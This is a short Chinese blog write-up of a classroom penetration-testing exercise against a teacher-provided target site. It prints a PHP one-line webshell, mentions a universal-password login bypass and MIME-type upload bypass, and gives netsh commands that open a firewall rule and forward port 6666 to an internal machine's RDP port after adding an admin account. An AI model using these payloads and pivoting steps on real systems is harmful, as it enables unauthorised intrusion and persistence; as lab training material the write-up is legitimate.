zoukankan      html  css  js  c++  java
  • 一次简单的渗透

    一次实验作业,老师给的靶场网站。

    进入网站,注册,登录,因为老师给了文件上传提示,所以直奔上传头像处

    上传小马,提示图片不存在

    将小马后缀改成.jpg,上传抓包

    tx的内容应该是将符号用url编码,其他内容用base64编码

    tx解码后内容:data:image/jpeg;base64,<?php @eval($_POST['a']); />

    发现一句话木马的尾部被修改了,将包发送出去,提示:

    查阅资料,应该是会用GD函数将图片渲染,不知道如何绕过。 

    上传图片马验证,抓包

    包中没有地方能修改文件后缀或文件类型

    御剑扫后台,扫出5个没用的目录

    自己随便输了/admin,进入后台登录界面

    分析该界面,注册、重置密码功能都是用前端JS写的,没有与后台数据库产生交互,只有登录功能有用

    尝试万能密码登录成功

    登录后是一个上传点,为服务端MIME 类型检测

    上传小马,更改文件类型

    上传成功

    蚁剑连接,查看权限

    查看端口,3389端口开放

    创建用户并加入管理员组

    这台服务器处于内网

    使用下面两条命令把来自外部的 tcp 的6666端口流量全部转发到内网的2008r2机器的3389端口上

    netsh advfirewall firewall add rule name="winmgmt" dir=in action=allow protocol=TCP localport=6666
    netsh interface portproxy add v4tov4 listenport=6666 connectaddress=192.168.2.57 connectport=3389

     用自己创建的账号远程桌面登录

     

    https://www.cnblogs.com/paperpen/p/10972904.html

     

  • 相关阅读:
    团队作业—第二阶段08
    团队作业—第二阶段07
    java--Map使用实现模拟斗地主洗牌发牌
    课程作业08 MVC框架具体使用
    课程作业 MVC框架
    课堂作业06_23种设计模式
    课堂作业05 《6种质量属性战术》
    课堂作业04
    课堂作业03
    架构漫谈阅读笔记
  • 原文地址:https://www.cnblogs.com/rnss/p/10973160.html
Copyright © 2011-2022 走看看